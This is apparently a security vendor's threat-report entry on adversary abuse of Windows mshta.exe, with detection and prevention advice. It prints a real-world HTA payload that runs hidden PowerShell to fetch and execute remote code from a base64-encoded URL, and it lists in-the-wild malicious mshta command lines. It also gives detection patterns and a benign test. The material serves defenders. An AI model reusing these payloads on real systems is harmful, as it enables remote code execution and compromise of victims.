Mshta
After a four-year hiatus, Mshta is back in the top 10, thanks in part to adversaries leveraging a “paste and run” technique for initial access.
#9
overall rank
4.9%
customers affected
384
threats detected
Why do adversaries use Mshta?
mshta.exe is a Windows-native binary designed to execute Microsoft HTML Application (HTA) script code. As its full name implies, Mshta can execute Windows Script Host code (VBScript and JScript) embedded within HTML in a network proxy-aware fashion. These capabilities make Mshta an appealing vehicle for adversaries to proxy execution of arbitrary script code through a trusted, signed utility, making it a reliable technique during both initial and later stages of an infection.
Mshta also grants adversaries the flexibility to embed a script payload within any legitimate file format. For example, it is common for adversaries to embed HTA content within legitimate Microsoft binaries (e.g., an embedded HTA payload contained within dialer.exe). They simply append malicious HTA content to the end of the file and mshta.exe scans through the file until it finds valid HTA script content. Adversaries know that a payload is less likely to be initially caught if it is embedded within an otherwise legitimate file.
Mshta grants adversaries the flexibility to embed a script payload within any legitimate file format.
How do adversaries use Mshta?
There are various methods in which HTA script content can be executed but adversaries generally prefer the following:
- inline via an argument passed in the command line to Mshta
- file-based execution via an HTML Application (HTA) file on disk
Regardless of the method used, adversaries generally only embed enough HTA script content to spawn a subsequent, malicious child process; powershell.exe in most cases.
Here is a sample, sanitized HTA payload based on the following VT sample:
<html>
<head>
<title>Google Reload DNS</title>
<HTA:APPLICATION ID="Google Repair" APPLICATIONNAME="B" BORDER="none" SHOWINTASKBAR="no" SINGLEINSTANCE="yes"
WINDOWSTATE="minimize">
</HTA:APPLICATION>
<script language="VBScript">
Option Explicit:Dim a:Set a=CreateObject("WScript.Shell"):Dim b:b="powershell -NoProfile -ExecutionPolicy Bypass -Command ""
{$U=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnRbLl1jb20vRGFzaW5pU3VtYW5hd2VlcmEvc2lsdmVyLWxhbXAvcmVmcy9oZWFkcy9tYWluL1JFREFDVEVELnR4dA=='))
$C=(Invoke-WebRequest -Uri $U -UseBasicParsing).Content
$B=[scriptblock]::Create($C)
$B}""":a.Run b,0,True:self.close
</script>
</head>
<body></body>
</html>
Additionally, here is a sampling of command-line invocation of mshta.exe commonly seen in the wild:
"mshta.exe" hXXps://rebekkaworm[.]snuggleam.org/time.json"mshta.exe" hXXps://pwctrustlaw[.]com/Ray-verify.html"C:\WINDOWS\system32\mshta.exe" hXXps://clicktogo[.]click/downloads/tra10"mshta.exe" "C:\Users\redacteduser\Downloads\QcNezuts8lmKJKw.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}"mshta.EXE" vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\redacteduser\Documents\redacted.ps1'"", 0:close")mshta C:\ProgramData\wBqERTofgffxGgvtPv.rtf
We’ve also observed adversaries leverage mshta.exe to download and execute a malicious payload from a remote resource in the popular “paste and run” technique described in detail in the Initial access section of this report.
Associated threats
Prevent the execution of HTA script content
When a Windows Defender Application Control (WDAC) policy is deployed, regardless of the configuration and enforcement mode, all HTA execution will be blocked. So even an allow-all policy in audit mode will block HTA execution without blocking execution of any other executables or scripts.
Deploying an allow-all policy is as easy as running the following code from an elevated PowerShell prompt:
ConvertFrom-CIPolicy -XmlFilePath C:\Windows\schemas\CodeIntegrity\ExamplePolicies\AllowAll.xml -BinaryFilePath C:\Windows\System32\CodeIntegrity\SIPolicy.p7b
CiTool.exe -up C:\Windows\System32\CodeIntegrity\SIPolicy.p7bWhen WDAC blocks the execution of HTA content, unfortunately, there are no logs to indicate a successful block, so be mindful of this when observing command-line evidence of HTA content. Rest assured, however, that execution will be prevented.
Note, however, that upon deploying an allow-all policy, a side effect is that PowerShell will be placed into constrained language mode which may not be desired without further validation. If the risk is acceptable however, constrained language mode by its very nature will block a significant amount of PowerShell-based attacks.
Note: The visibility sections in this report are mapped to MITRE ATT&CK data sources and components.
Process and command-line monitoring
Monitoring process execution along with command-line parameters offers defenders visibility into many behaviors associated with malicious abuse of Mshta. Similarly, process lineage is also helpful for detecting adversary use of Mshta. At a minimum, collect parent-child process relationships, and, if possible, consider collecting information about “grandparent” relationships too.
Note: when an mshta.exe command-line invocation ends with {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}, it indicates that it was launched interactively via a double-clicking an HTA file. The parent process in this case will be explorer.exe.
Network connection monitoring
Monitoring network connections associated with Mshta would reveal any instances where it connected to an external IP or domain.
Considering how infrequently Mshta is used for legitimate purposes, it can be relatively easy to detect suspicious activity by detecting on the following behaviors.
MSHTA spawning from suspect processes
mshta.exe spawning powershell.exe or cmd.exe can be a good indicator of malice. The following pseudo-detector offers a good starting point:
process == ‘mshta.exe’
&&
child_process == (‘cmd.exe’ || ‘powershell.exe’)MSHTA spawning from suspicious processes
It’s also suspicious when mshta.exe spawns from any of the following executables:
- a browser
- an Office executable
w3wp.exewmiprvse.exespoolsv.exe
As such, the following analytic offers a good place for security teams to start:
process == (‘w3wp.exe’ || ‘wmiprvse.exe’ || ‘spoolsv.exe’)
&&
child_process == ‘mshta.exe’Additional detection ideas
mshta.exeexecuting a file on disk that doesn’t end with the expected extension,.hta. We commonly see the following extensions in the wild:.batand.rtfmshta.exeexecuting content inline using any of the built-in protocol handlers: JavaScript, VBScript, or Aboutmshta.exemaking a network connection to an external domain or IP address
Start testing your defenses against Mshta using Atomic Red Team—an open source testing framework of small, highly portable detection tests mapped to MITRE ATT&CK.
Getting started
View atomic tests for T1218.005: Mshta. In most environments, these should be sufficient to generate a useful signal for defenders.
Run this test on a Windows system using Command Prompt:
mshta.exe "about:<hta:application><script language="VBScript">Close(Execute("CreateObject(""Wscript.Shell"").Run%20""powershell.exe%20-nop%20-Command%20Write-Host%20Hello,%20MSHTA!;Start-Sleep%20-Seconds%205"""))</script>'"What to expect
mshta.exe will spawn a child powershell.exe process that displays “Hello, MSHTA” to the console.
Useful telemetry
| Data source | Telemetry |
|---|---|
Process monitoring | An |
Process command-line parameters | Command-line logging will capture the context of what is executed. |
DLL monitoring |
|
Review and repeat
Now that you have executed one or several common tests and checked for the expected results, it’s useful to answer some immediate questions:
- Were any of your actions detected?
- Were any of your actions blocked or prevented?
- Were your actions visible in logs or other defensive telemetry?
Repeat this process, performing additional tests related to this technique. You can also create and contribute tests of your own.
Security gaps? We got you.
Get curated insights on managed detection and response (MDR) services, threat intelligence, and security operations—delivered straight to your inbox every month.